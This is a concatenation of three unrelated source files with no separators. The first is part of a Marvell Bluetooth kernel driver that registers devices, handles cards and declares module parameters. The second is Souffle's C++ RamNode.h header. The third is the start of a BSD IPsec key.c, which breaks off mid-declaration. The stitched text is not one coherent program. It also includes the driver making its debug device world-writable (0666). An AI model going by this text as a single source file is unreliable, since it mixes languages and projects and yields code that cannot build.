snprintf(debug_dev->name, sizeof(debug_dev->name), "mdebugchar%d", debugchar_minor); snprintf(dev_file, sizeof(dev_file), "/dev/%s", debug_dev->name); debugchar_minor++; /** register char dev */ priv->bt_dev.m_dev[DEBUG_SEQ].index = char_dev->minor; char_dev->m_dev = &(priv->bt_dev.m_dev[DEBUG_SEQ]); register_char_dev(char_dev, chardev_class, MODULE_NAME, debug_dev->name); /** chmod for debug char device */ mbtchar_chmod(dev_file, 0666); /** create proc device */ 
snprintf(priv->bt_dev.m_dev[DEBUG_SEQ].name, sizeof(priv->bt_dev.m_dev[DEBUG_SEQ].name), debug_dev->name); bt_proc_init(priv, &(priv->bt_dev.m_dev[DEBUG_SEQ]), DEBUG_SEQ); } if (init_cfg) if (BT_STATUS_SUCCESS != bt_init_config(priv, init_cfg)) { PRINTM(FATAL, "BT: Set user init data and param failed\n"); if (mbt_dev) { m_dev = &(priv->bt_dev.m_dev[BT_SEQ]); /** unregister m_dev to char_dev */ m_dev->close(m_dev); for (i = 0; i < 3; i++) kfree_skb(mbt_dev->reassembly[i]); /** unregister m_dev to char_dev */ chardev_cleanup_one(m_dev, chardev_class); free_m_dev(m_dev); } ret = BT_STATUS_FAILURE; goto done; } if (cal_cfg) { if (BT_STATUS_SUCCESS != bt_cal_config(priv, cal_cfg, bt_mac)) { PRINTM(FATAL, "BT: Set cal data failed\n"); if (mbt_dev) { m_dev = &(priv->bt_dev.m_dev[BT_SEQ]); /** unregister m_dev to char_dev */ m_dev->close(m_dev); for (i = 0; i < 3; i++) kfree_skb(mbt_dev->reassembly[i]); /** unregister m_dev to char_dev */ chardev_cleanup_one(m_dev, chardev_class); free_m_dev(m_dev); } ret = BT_STATUS_FAILURE; goto done; } } else if (bt_mac) { PRINTM(INFO, "Set BT mac_addr from insmod parametre bt_mac = %s\n", bt_mac); if (BT_STATUS_SUCCESS != bt_init_mac_address(priv, bt_mac)) { PRINTM(FATAL, "BT: Fail to set mac address from insmod parametre\n"); ret = BT_STATUS_FAILURE; goto done; } } if (cal_cfg_ext) { if (BT_STATUS_SUCCESS != bt_cal_config_ext(priv, cal_cfg_ext)) { PRINTM(FATAL, "BT: Set cal ext data failed\n"); if (mbt_dev) { m_dev = &(priv->bt_dev.m_dev[BT_SEQ]); /** unregister m_dev to char_dev */ m_dev->close(m_dev); for (i = 0; i < 3; i++) kfree_skb(mbt_dev->reassembly[i]); /** unregister m_dev to char_dev */ chardev_cleanup_one(m_dev, chardev_class); free_m_dev(m_dev); } ret = BT_STATUS_FAILURE; goto done; } } if (init_cfg || cal_cfg || bt_mac || cal_cfg_ext) { priv->adapter->tx_lock = FALSE; bt_restore_tx_queue(priv); } bt_register_hostwake_irq(NULL); /* Get FW version */ bt_get_fw_version(priv); snprintf(priv->adapter->drv_ver, MAX_VER_STR_LEN, 
mbt_driver_version, fw_version);

done:
	LEAVE();
	return ret;

err_kmalloc:
	/* Failure path for device allocation above: kfree(NULL) is a no-op
	 * in the kernel, so freeing all four unconditionally is safe. */
	kfree(mbt_dev);
	kfree(fm_dev);
	kfree(nfc_dev);
	kfree(debug_dev);
	LEAVE();
	return ret;
}

/**
 *  @brief This function adds the card. it will probe the
 *  card, allocate the bt_priv and initialize the device.
 *
 *  @param card   A pointer to card
 *  @return       A pointer to bt_private structure, or NULL on failure
 */
bt_private *
bt_add_card(void *card)
{
	bt_private *priv = NULL;

	ENTER();

	priv = bt_alloc_priv();
	if (!priv) {
		PRINTM(FATAL, "Can not allocate priv\n");
		LEAVE();
		return NULL;
	}
	/* allocate buffer for bt_adapter */
	priv->adapter = kzalloc(sizeof(bt_adapter), GFP_KERNEL);
	if (!priv->adapter) {
		PRINTM(FATAL, "Allocate buffer for bt_adapter failed!\n");
		goto err_kmalloc;
	}
	bt_init_adapter(priv);
	PRINTM(INFO, "Starting kthread...\n");
	priv->MainThread.priv = priv;
	spin_lock_init(&priv->driver_lock);
	bt_create_thread(bt_service_main_thread, &priv->MainThread,
			 "bt_main_service");
	/* wait for mainthread to up */
	while (!priv->MainThread.pid)
		os_sched_timeout(1);
	priv->bt_dev.card = card;
	((struct sdio_mmc_card *)card)->priv = priv;
	priv->adapter->sd_ireg = 0;
	/*
	 * Register the device. Fillup the private data structure with
	 * relevant information from the card and request for the required
	 * IRQ.
	 */
	if (sbi_register_dev(priv) < 0) {
		PRINTM(FATAL, "Failed to register bt device!\n");
		goto err_registerdev;
	}
	if (bt_init_fw(priv)) {
		PRINTM(FATAL, "BT Firmware Init Failed\n");
		goto err_init_fw;
	}
	LEAVE();
	return priv;

err_init_fw:
	bt_proc_remove(priv);
	PRINTM(INFO, "Unregister device\n");
	sbi_unregister_dev(priv);
err_registerdev:
	((struct sdio_mmc_card *)card)->priv = NULL;
	/* Stop the thread servicing the interrupts */
	priv->adapter->SurpriseRemoved = TRUE;
	wake_up_interruptible(&priv->MainThread.waitQ);
	while (priv->MainThread.pid)
		os_sched_timeout(1);
err_kmalloc:
	if (priv->adapter)
		bt_free_adapter(priv);
	bt_priv_put(priv);
	LEAVE();
	return NULL;
}

/**
 *  @brief This function removes the card.
* * @param card A pointer to card * @return BT_STATUS_SUCCESS */ int bt_remove_card(void *card) { struct m_dev *m_dev = NULL; bt_private *priv = (bt_private *) card; int i; ENTER(); if (!priv) { LEAVE(); return BT_STATUS_SUCCESS; } if (!priv->adapter->SurpriseRemoved) { bt_send_reset_command(priv); bt_send_module_cfg_cmd(priv, MODULE_SHUTDOWN_REQ); /* Disable interrupts on the card */ sd_disable_host_int(priv); priv->adapter->SurpriseRemoved = TRUE; } wake_up_interruptible(&priv->adapter->cmd_wait_q); priv->adapter->SurpriseRemoved = TRUE; wake_up_interruptible(&priv->MainThread.waitQ); while (priv->MainThread.pid) { os_sched_timeout(1); wake_up_interruptible(&priv->MainThread.waitQ); } bt_proc_remove(priv); PRINTM(INFO, "Unregister device\n"); sbi_unregister_dev(priv); if (priv->bt_dev.m_dev[BT_SEQ].dev_pointer) { m_dev = &(priv->bt_dev.m_dev[BT_SEQ]); if (m_dev->spec_type == IANYWHERE_SPEC) { if ((drv_mode & DRV_MODE_BT) && (mbtchar_minor > 0)) mbtchar_minor--; m_dev->close(m_dev); for (i = 0; i < 3; i++) kfree_skb(((struct mbt_dev *) (m_dev->dev_pointer))-> reassembly[i]); /** unregister m_dev to char_dev */ if (chardev_class) chardev_cleanup_one(m_dev, chardev_class); free_m_dev(m_dev); } } if (priv->bt_dev.m_dev[FM_SEQ].dev_pointer) { m_dev = &(priv->bt_dev.m_dev[FM_SEQ]); if ((drv_mode & DRV_MODE_FM) && (fmchar_minor > 0)) fmchar_minor--; m_dev->close(m_dev); /** unregister m_dev to char_dev */ if (chardev_class) chardev_cleanup_one(m_dev, chardev_class); free_m_dev(m_dev); } if (priv->bt_dev.m_dev[NFC_SEQ].dev_pointer) { m_dev = &(priv->bt_dev.m_dev[NFC_SEQ]); if ((drv_mode & DRV_MODE_NFC) && (nfcchar_minor > 0)) nfcchar_minor--; m_dev->close(m_dev); /** unregister m_dev to char_dev */ if (chardev_class) chardev_cleanup_one(m_dev, chardev_class); free_m_dev(m_dev); } if (priv->bt_dev.m_dev[DEBUG_SEQ].dev_pointer) { m_dev = &(priv->bt_dev.m_dev[DEBUG_SEQ]); if ((debug_intf) && (debugchar_minor > 0)) debugchar_minor--; /** unregister m_dev to char_dev */ if 
(chardev_class) chardev_cleanup_one(m_dev, chardev_class); free_m_dev(m_dev); } PRINTM(INFO, "Free Adapter\n"); bt_free_adapter(priv); bt_priv_put(priv); LEAVE(); return BT_STATUS_SUCCESS; } /** * @brief This function sets card detect * * @param on card detect status * @return 0 */ static int bt_set_carddetect(int on) { PRINTM(MSG, "%s = %d\n", __func__, on); if (bt_control_data && bt_control_data->set_carddetect) bt_control_data->set_carddetect(on); return 0; } /** * @brief This function sets power * * @param on power status * @return 0 */ static int bt_set_power(int on, unsigned long msec) { PRINTM(MSG, "%s = %d\n", __func__, on); if (bt_control_data && bt_control_data->set_power) bt_control_data->set_power(on); if (msec) mdelay(msec); return 0; } static irqreturn_t bt_hostwake_isr(int irq, void *dev_id) { PRINTM(INTR, "Recv hostwake isr\n"); return IRQ_HANDLED; } void bt_enable_hostwake_irq(int flag) { if (bt_irqres && irq_registered) { PRINTM(INTR, "enable_hostwake_irq=%d\n", flag); if (flag) { enable_irq(bt_irqres->start); enable_irq_wake(bt_irqres->start); } else { disable_irq_wake(bt_irqres->start); disable_irq(bt_irqres->start); } } } static void bt_register_hostwake_irq(void *handle) { if (bt_irqres && !irq_registered) { irq_registered = request_irq(bt_irqres->start, bt_hostwake_isr, bt_irqres->flags, DRIVER_NAME, handle); if (irq_registered < 0) PRINTM(ERROR, "Couldn't acquire BT_HOST_WAKE IRQ\n"); else { irq_registered = 1; enable_irq_wake(bt_irqres->start); bt_enable_hostwake_irq(FALSE); } } } void mdev_poweroff(struct m_dev *m_dev) { ENTER(); if (minicard_pwrup) { bt_set_power(0, 0); bt_set_carddetect(0); } LEAVE(); } /** * @brief This function probes the platform-level device * * @param pdev pointer to struct platform_device * @return 0 */ static int bt_probe(struct platform_device *pdev) { struct wifi_platform_data *bt_ctrl = (struct wifi_platform_data *)(pdev->dev.platform_data); ENTER(); bt_irqres = platform_get_resource_byname(pdev, 
IORESOURCE_IRQ, IORESOURCE_NAME);
	if (minicard_pwrup) {
		bt_control_data = bt_ctrl;
		bt_set_power(1, 0);	/* Power On */
		bt_set_carddetect(1);	/* CardDetect (0->1) */
	}
	LEAVE();
	return 0;
}

/**
 *  @brief This function removes the platform-level device
 *
 *  @param pdev   pointer to struct platform_device
 *  @return       0
 */
static int
bt_remove(struct platform_device *pdev)
{
	struct wifi_platform_data *bt_ctrl =
		(struct wifi_platform_data *)(pdev->dev.platform_data);
	ENTER();
	/* Release the host-wake IRQ if one was acquired earlier */
	if (bt_irqres && irq_registered) {
		PRINTM(MSG, "Free hostwake IRQ wakeup\n");
		free_irq(bt_irqres->start, NULL);
		irq_registered = 0;
	}
	if (minicard_pwrup) {
		bt_control_data = bt_ctrl;
		bt_set_power(0, 0);	/* Power Off */
		bt_set_carddetect(0);	/* CardDetect (1->0) */
	}
	LEAVE();
	return 0;
}

/* Platform driver binding for the "mrvl_bt" platform device */
static struct platform_driver bt_device = {
	.probe = bt_probe,
	.remove = bt_remove,
	.driver = {
		   .name = "mrvl_bt",
		   }
};

/**
 *  @brief This function registers the platform-level device to the bus driver
 *
 *  @return       0--success, failure otherwise
 */
static int
bt_add_dev(void)
{
	int ret = 0;
	ENTER();
	ret = platform_driver_register(&bt_device);
	LEAVE();
	return ret;
}

/**
 *  @brief This function deregisters the platform-level device
 *
 *  @return       N/A
 */
static void
bt_del_dev(void)
{
	ENTER();
	platform_driver_unregister(&bt_device);
	LEAVE();
}

/**
 *  @brief This function initializes module.
* * @return BT_STATUS_SUCCESS or BT_STATUS_FAILURE */ static int bt_init_module(void) { int ret = BT_STATUS_SUCCESS; ENTER(); PRINTM(MSG, "BT: Loading driver\n"); bt_root_proc_init(); /** create char device class */ chardev_class = class_create(THIS_MODULE, MODULE_NAME); if (IS_ERR(chardev_class)) { PRINTM(ERROR, "Unable to allocate class\n"); bt_root_proc_remove(); ret = PTR_ERR(chardev_class); goto done; } bt_add_dev(); if (sbi_register() == NULL) { bt_root_proc_remove(); ret = BT_STATUS_FAILURE; goto done; } done: if (ret) PRINTM(MSG, "BT: Driver loading failed\n"); else PRINTM(MSG, "BT: Driver loaded successfully\n"); LEAVE(); return ret; } /** * @brief This function cleans module * * @return N/A */ static void bt_exit_module(void) { ENTER(); PRINTM(MSG, "BT: Unloading driver\n"); sbi_unregister(); bt_root_proc_remove(); bt_del_dev(); class_destroy(chardev_class); PRINTM(MSG, "BT: Driver unloaded\n"); LEAVE(); } module_init(bt_init_module); module_exit(bt_exit_module); MODULE_AUTHOR("Marvell International Ltd."); MODULE_DESCRIPTION("Marvell Bluetooth Driver Ver. 
" VERSION); MODULE_VERSION(VERSION); MODULE_LICENSE("GPL"); module_param(fw, int, 1); MODULE_PARM_DESC(fw, "0: Skip firmware download; otherwise: Download firmware"); module_param(psmode, int, 1); MODULE_PARM_DESC(psmode, "1: Enable powermode; 0: Disable powermode"); #ifdef DEBUG_LEVEL1 module_param(mbt_drvdbg, uint, 0); MODULE_PARM_DESC(mbt_drvdbg, "BIT3:DBG_DATA BIT4:DBG_CMD 0xFF:DBG_ALL"); #endif #ifdef SDIO_SUSPEND_RESUME module_param(mbt_pm_keep_power, int, 1); MODULE_PARM_DESC(mbt_pm_keep_power, "1: PM keep power; 0: PM no power"); #endif module_param(init_cfg, charp, 0); MODULE_PARM_DESC(init_cfg, "BT init config file name"); module_param(cal_cfg, charp, 0); MODULE_PARM_DESC(cal_cfg, "BT calibrate file name"); module_param(cal_cfg_ext, charp, 0); MODULE_PARM_DESC(cal_cfg_ext, "BT calibrate ext file name"); module_param(bt_mac, charp, 0); MODULE_PARM_DESC(bt_mac, "BT init mac address"); module_param(minicard_pwrup, int, 0); MODULE_PARM_DESC(minicard_pwrup, "1: Driver load clears PDn/Rst, unload sets (default); 0: Don't do this."); module_param(drv_mode, int, 0); MODULE_PARM_DESC(drv_mode, "Bit 0: BT/AMP/BLE; Bit 1: FM; Bit 2: NFC"); module_param(bt_name, charp, 0); MODULE_PARM_DESC(bt_name, "BT interface name"); module_param(fm_name, charp, 0); MODULE_PARM_DESC(fm_name, "FM interface name"); module_param(nfc_name, charp, 0); MODULE_PARM_DESC(nfc_name, "NFC interface name"); module_param(debug_intf, int, 1); MODULE_PARM_DESC(debug_intf, "1: Enable debug interface; 0: Disable debug interface "); module_param(debug_name, charp, 0); MODULE_PARM_DESC(debug_name, "Debug interface name");
/* * Souffle - A Datalog Compiler * Copyright (c) 2013, 2015, Oracle and/or its affiliates. All rights reserved * Licensed under the Universal Permissive License v 1.0 as shown at: * - https://opensource.org/licenses/UPL * - <souffle root>/licenses/SOUFFLE-UPL.txt */ /************************************************************************ * * @file RamNode.h * * Top level syntactic element of intermediate representation, * i.e., a node of the RAM machine code. * ***********************************************************************/ #pragma once #include <cassert> #include <functional> #include <iostream> #include <memory> #include <typeinfo> #include <vector> namespace souffle { class RamNode; /** * @class RamNodeMapper * @brief An abstract class for manipulating RAM Nodes by substitution */ class RamNodeMapper { public: virtual ~RamNodeMapper() = default; /** * @brief Abstract replacement method for a node. * * If the given nodes is to be replaced, the handed in node * will be destroyed by the mapper and the returned node * will become owned by the caller. */ virtual std::unique_ptr<RamNode> operator()(std::unique_ptr<RamNode> node) const = 0; /** * @brief Wrapper for any subclass of the RAM node hierarchy performing type casts. */ template <typename T> std::unique_ptr<T> operator()(std::unique_ptr<T> node) const { std::unique_ptr<RamNode> resPtr = (*this)(std::unique_ptr<RamNode>(static_cast<RamNode*>(node.release()))); assert(nullptr != dynamic_cast<T*>(resPtr.get()) && "Invalid target node!"); return std::unique_ptr<T>(dynamic_cast<T*>(resPtr.release())); } }; namespace detail { /** * @class LambdaRamNodeMapper * @brief A special RamNodeMapper wrapping a lambda conducting node transformations. 
*/ template <typename Lambda> class LambdaRamNodeMapper : public RamNodeMapper { const Lambda& lambda; public: /** * @brief Constructor for LambdaRamNodeMapper */ LambdaRamNodeMapper(const Lambda& lambda) : lambda(lambda) {} /** * @brief Applies lambda */ std::unique_ptr<RamNode> operator()(std::unique_ptr<RamNode> node) const override { return lambda(std::move(node)); } }; } // namespace detail /** * @brief Creates a node mapper based on a corresponding lambda expression. */ template <typename Lambda> detail::LambdaRamNodeMapper<Lambda> makeLambdaRamMapper(const Lambda& lambda) { return detail::LambdaRamNodeMapper<Lambda>(lambda); } /** * @class RamNode * @brief RamNode is a superclass for all RAM IR classes. */ class RamNode { public: /* * @brief A virtual destructor for RAM nodes */ virtual ~RamNode() = default; /** * @brief Equivalence check for two RAM nodes */ bool operator==(const RamNode& other) const { return this == &other || (typeid(*this) == typeid(other) && equal(other)); } /** * @brief Inequality check for two RAM nodes */ bool operator!=(const RamNode& other) const { return !(*this == other); } /** * @brief Create a clone (i.e. 
deep copy) of this node */ virtual RamNode* clone() const = 0; /** * @brief Apply the mapper to all child nodes */ virtual void apply(const RamNodeMapper& mapper) {} /** * @brief Rewrite a child node */ virtual void rewrite(const RamNode* oldNode, std::unique_ptr<RamNode> newNode) { std::function<std::unique_ptr<RamNode>(std::unique_ptr<RamNode>)> rewriter = [&](std::unique_ptr<RamNode> node) -> std::unique_ptr<RamNode> { if (oldNode == node.get()) { return std::move(newNode); } else { node->apply(makeLambdaRamMapper(rewriter)); return node; } }; apply(makeLambdaRamMapper(rewriter)); }; /** * @brief Obtain list of all embedded child nodes */ virtual std::vector<const RamNode*> getChildNodes() const { return {}; } /** * @brief Print RAM node */ virtual void print(std::ostream& out = std::cout) const = 0; /** * Print RAM on a stream */ friend std::ostream& operator<<(std::ostream& out, const RamNode& node) { node.print(out); return out; } protected: /** * @brief Equality check for two RAM nodes. * Default action is that nothing needs to be checked. */ virtual bool equal(const RamNode& other) const { return true; } }; } // end of namespace souffle
/* $FreeBSD: src/sys/netipsec/key.c,v 1.3.2.1 2003/01/24 05:11:35 sam Exp $ */ /* $KAME: key.c,v 1.191 2001/06/27 10:46:49 sakane Exp $ */ /* * Copyright (C) 1995, 1996, 1997, and 1998 WIDE Project. * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. Neither the name of the project nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE PROJECT AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE PROJECT OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. 
This code refers to RFC 2367
*/ #ifndef IPSEC_DEBUG2 static struct callout key_timehandler_ch; #endif u_int32_t key_debug_level = 0; static u_int key_spi_trycnt = 1000; static u_int32_t key_spi_minval = 0x100; static u_int32_t key_spi_maxval = 0x0fffffff; /* XXX */ static u_int32_t policy_id = 0; static u_int key_int_random = 60; /*interval to initialize randseed,1(m)*/ static u_int key_larval_lifetime = 30; /* interval to expire acquiring, 30(s)*/ static int key_blockacq_count = 10; /* counter for blocking SADB_ACQUIRE.*/ static int key_blockacq_lifetime = 20; /* lifetime for blocking SADB_ACQUIRE.*/ static int key_prefered_oldsa = 1; /* prefered old sa rather than new sa.*/ static u_int32_t acq_seq = 0; static int key_tick_init_random = 0; static LIST_HEAD(_sptree, secpolicy) sptree[IPSEC_DIR_MAX]; /* SPD */ static LIST_HEAD(_sahtree, secashead) sahtree; /* SAD */ static LIST_HEAD(_regtree, secreg) regtree[SADB_SATYPE_MAX + 1]; /* registed list */ #ifndef IPSEC_NONBLOCK_ACQUIRE static LIST_HEAD(_acqtree, secacq) acqtree; /* acquiring list */ #endif static LIST_HEAD(_spacqtree, secspacq) spacqtree; /* SP acquiring list */ /* search order for SAs */ static u_int saorder_state_valid[] = { SADB_SASTATE_DYING, SADB_SASTATE_MATURE, /* * This order is important because we must select the oldest SA * for outbound processing. For inbound, This is not important. 
*/ }; static u_int saorder_state_alive[] = { /* except DEAD */ SADB_SASTATE_MATURE, SADB_SASTATE_DYING, SADB_SASTATE_LARVAL }; static u_int saorder_state_any[] = { SADB_SASTATE_MATURE, SADB_SASTATE_DYING, SADB_SASTATE_LARVAL, SADB_SASTATE_DEAD }; static const int minsize[] = { sizeof(struct sadb_msg), /* SADB_EXT_RESERVED */ sizeof(struct sadb_sa), /* SADB_EXT_SA */ sizeof(struct sadb_lifetime), /* SADB_EXT_LIFETIME_CURRENT */ sizeof(struct sadb_lifetime), /* SADB_EXT_LIFETIME_HARD */ sizeof(struct sadb_lifetime), /* SADB_EXT_LIFETIME_SOFT */ sizeof(struct sadb_address), /* SADB_EXT_ADDRESS_SRC */ sizeof(struct sadb_address), /* SADB_EXT_ADDRESS_DST */ sizeof(struct sadb_address), /* SADB_EXT_ADDRESS_PROXY */ sizeof(struct sadb_key), /* SADB_EXT_KEY_AUTH */ sizeof(struct sadb_key), /* SADB_EXT_KEY_ENCRYPT */ sizeof(struct sadb_ident), /* SADB_EXT_IDENTITY_SRC */ sizeof(struct sadb_ident), /* SADB_EXT_IDENTITY_DST */ sizeof(struct sadb_sens), /* SADB_EXT_SENSITIVITY */ sizeof(struct sadb_prop), /* SADB_EXT_PROPOSAL */ sizeof(struct sadb_supported), /* SADB_EXT_SUPPORTED_AUTH */ sizeof(struct sadb_supported), /* SADB_EXT_SUPPORTED_ENCRYPT */ sizeof(struct sadb_spirange), /* SADB_EXT_SPIRANGE */ 0, /* SADB_X_EXT_KMPRIVATE */ sizeof(struct sadb_x_policy), /* SADB_X_EXT_POLICY */ sizeof(struct sadb_x_sa2), /* SADB_X_SA2 */ }; static const int maxsize[] = { sizeof(struct sadb_msg), /* SADB_EXT_RESERVED */ sizeof(struct sadb_sa), /* SADB_EXT_SA */ sizeof(struct sadb_lifetime), /* SADB_EXT_LIFETIME_CURRENT */ sizeof(struct sadb_lifetime), /* SADB_EXT_LIFETIME_HARD */ sizeof(struct sadb_lifetime), /* SADB_EXT_LIFETIME_SOFT */ 0, /* SADB_EXT_ADDRESS_SRC */ 0, /* SADB_EXT_ADDRESS_DST */ 0, /* SADB_EXT_ADDRESS_PROXY */ 0, /* SADB_EXT_KEY_AUTH */ 0, /* SADB_EXT_KEY_ENCRYPT */ 0, /* SADB_EXT_IDENTITY_SRC */ 0, /* SADB_EXT_IDENTITY_DST */ 0, /* SADB_EXT_SENSITIVITY */ 0, /* SADB_EXT_PROPOSAL */ 0, /* SADB_EXT_SUPPORTED_AUTH */ 0, /* SADB_EXT_SUPPORTED_ENCRYPT */ sizeof(struct 
sadb_spirange), /* SADB_EXT_SPIRANGE */ 0, /* SADB_X_EXT_KMPRIVATE */ 0, /* SADB_X_EXT_POLICY */ sizeof(struct sadb_x_sa2), /* SADB_X_SA2 */ }; static int ipsec_esp_keymin = 256; static int ipsec_esp_auth = 0; static int ipsec_ah_keymin = 128; #ifdef SYSCTL_DECL SYSCTL_DECL(_net_key); #endif SYSCTL_INT(_net_key, KEYCTL_DEBUG_LEVEL, debug, CTLFLAG_RW, \ &key_debug_level, 0, ""); /* max count of trial for the decision of spi value */ SYSCTL_INT(_net_key, KEYCTL_SPI_TRY, spi_trycnt, CTLFLAG_RW, \ &key_spi_trycnt, 0, ""); /* minimum spi value to allocate automatically. */ SYSCTL_INT(_net_key, KEYCTL_SPI_MIN_VALUE, spi_minval, CTLFLAG_RW, \ &key_spi_minval, 0, ""); /* maximun spi value to allocate automatically. */ SYSCTL_INT(_net_key, KEYCTL_SPI_MAX_VALUE, spi_maxval, CTLFLAG_RW, \ &key_spi_maxval, 0, ""); /* interval to initialize randseed */ SYSCTL_INT(_net_key, KEYCTL_RANDOM_INT, int_random, CTLFLAG_RW, \ &key_int_random, 0, ""); /* lifetime for larval SA */ SYSCTL_INT(_net_key, KEYCTL_LARVAL_LIFETIME, larval_lifetime, CTLFLAG_RW, \ &key_larval_lifetime, 0, ""); /* counter for blocking to send SADB_ACQUIRE to IKEd */ SYSCTL_INT(_net_key, KEYCTL_BLOCKACQ_COUNT, blockacq_count, CTLFLAG_RW, \ &key_blockacq_count, 0, ""); /* lifetime for blocking to send SADB_ACQUIRE to IKEd */ SYSCTL_INT(_net_key, KEYCTL_BLOCKACQ_LIFETIME, blockacq_lifetime, CTLFLAG_RW, \ &key_blockacq_lifetime, 0, ""); /* ESP auth */ SYSCTL_INT(_net_key, KEYCTL_ESP_AUTH, esp_auth, CTLFLAG_RW, \ &ipsec_esp_auth, 0, ""); /* minimum ESP key length */ SYSCTL_INT(_net_key, KEYCTL_ESP_KEYMIN, esp_keymin, CTLFLAG_RW, \ &ipsec_esp_keymin, 0, ""); /* minimum AH key length */ SYSCTL_INT(_net_key, KEYCTL_AH_KEYMIN, ah_keymin, CTLFLAG_RW, \ &ipsec_ah_keymin, 0, ""); /* perfered old SA rather than new SA */ SYSCTL_INT(_net_key, KEYCTL_PREFERED_OLDSA, prefered_oldsa, CTLFLAG_RW,\ &key_prefered_oldsa, 0, ""); #define __LIST_CHAINED(elm) \ (!((elm)->chain.le_next == NULL && (elm)->chain.le_prev == NULL)) #define 
LIST_INSERT_TAIL(head, elm, type, field) \ do {\ struct type *curelm = LIST_FIRST(head); \ if (curelm == NULL) {\ LIST_INSERT_HEAD(head, elm, field); \ } else { \ while (LIST_NEXT(curelm, field)) \ curelm = LIST_NEXT(curelm, field);\ LIST_INSERT_AFTER(curelm, elm, field);\ }\ } while (0) #define KEY_CHKSASTATE(head, sav, name) \ do { \ if ((head) != (sav)) { \ ipseclog((LOG_DEBUG, "%s: state mismatched (TREE=%d SA=%d)\n", \ (name), (head), (sav))); \ continue; \ } \ } while (0) #define KEY_CHKSPDIR(head, sp, name) \ do { \ if ((head) != (sp)) { \ ipseclog((LOG_DEBUG, "%s: direction mismatched (TREE=%d SP=%d), " \ "anyway continue.\n", \ (name), (head), (sp))); \ } \ } while (0) MALLOC_DEFINE(M_SECA, "key mgmt", "security associations, key management"); #if 1 #define KMALLOC(p, t, n) \ ((p) = (t) kmalloc((unsigned long)(n), M_SECA, M_INTWAIT | M_NULLOK)) #define KFREE(p) \ kfree((caddr_t)(p), M_SECA) #else #define KMALLOC(p, t, n) \ do { \ ((p) = (t)kmalloc((unsigned long)(n), M_SECA, M_INTWAIT | M_NULLOK)); \ kprintf("%s %d: %p <- KMALLOC(%s, %d)\n", \ __FILE__, __LINE__, (p), #t, n); \ } while (0) #define KFREE(p) \ do { \ kprintf("%s %d: %p -> KFREE()\n", __FILE__, __LINE__, (p)); \ kfree((caddr_t)(p), M_SECA); \ } while (0) #endif /* * set parameters into secpolicyindex buffer. * Must allocate secpolicyindex buffer passed to this function. */ #define KEY_SETSECSPIDX(_dir, s, d, ps, pd, ulp, idx) \ do { \ bzero((idx), sizeof(struct secpolicyindex)); \ (idx)->dir = (_dir); \ (idx)->prefs = (ps); \ (idx)->prefd = (pd); \ (idx)->ul_proto = (ulp); \ bcopy((s), &(idx)->src, ((const struct sockaddr *)(s))->sa_len); \ bcopy((d), &(idx)->dst, ((const struct sockaddr *)(d))->sa_len); \ } while (0) /* * set parameters into secasindex buffer. * Must allocate secasindex buffer before calling this function. 
*/ #define KEY_SETSECASIDX(p, m, r, s, d, idx) \ do { \ bzero((idx), sizeof(struct secasindex)); \ (idx)->proto = (p); \ (idx)->mode = (m); \ (idx)->reqid = (r); \ bcopy((s), &(idx)->src, ((const struct sockaddr *)(s))->sa_len); \ bcopy((d), &(idx)->dst, ((const struct sockaddr *)(d))->sa_len); \ } while (0) /* key statistics */ struct _keystat { u_long getspi_count; /* the avarage of count to try to get new SPI */ } keystat; struct sadb_msghdr { struct sadb_msg *msg; struct sadb_ext *ext[SADB_EXT_MAX + 1]; int extoff[SADB_EXT_MAX + 1]; int extlen[SADB_EXT_MAX + 1]; }; static struct secasvar *key_allocsa_policy (const struct secasindex *); static void key_freesp_so (struct secpolicy **); static struct secasvar *key_do_allocsa_policy (struct secashead *, u_int); static void key_delsp (struct secpolicy *); static struct secpolicy *key_getsp (struct secpolicyindex *); static struct secpolicy *key_getspbyid (u_int32_t); static u_int32_t key_newreqid (void); static struct mbuf *key_gather_mbuf (struct mbuf *, const struct sadb_msghdr *, int, int, ...); static int key_spdadd (struct socket *, struct mbuf *, const struct sadb_msghdr *); static u_int32_t key_getnewspid (void); static int key_spddelete (struct socket *, struct mbuf *, const struct sadb_msghdr *); static int key_spddelete2 (struct socket *, struct mbuf *, const struct sadb_msghdr *); static int key_spdget (struct socket *, struct mbuf *, const struct sadb_msghdr *); static int key_spdflush (struct socket *, struct mbuf *, const struct sadb_msghdr *); static int key_spddump (struct socket *, struct mbuf *, const struct sadb_msghdr *); static struct mbuf *key_setdumpsp (struct secpolicy *, u_int8_t, u_int32_t, u_int32_t); static u_int key_getspreqmsglen (struct secpolicy *); static int key_spdexpire (struct secpolicy *); static struct secashead *key_newsah (struct secasindex *); static void key_delsah (struct secashead *); static struct secasvar *key_newsav (struct mbuf *, const struct sadb_msghdr *, struct 
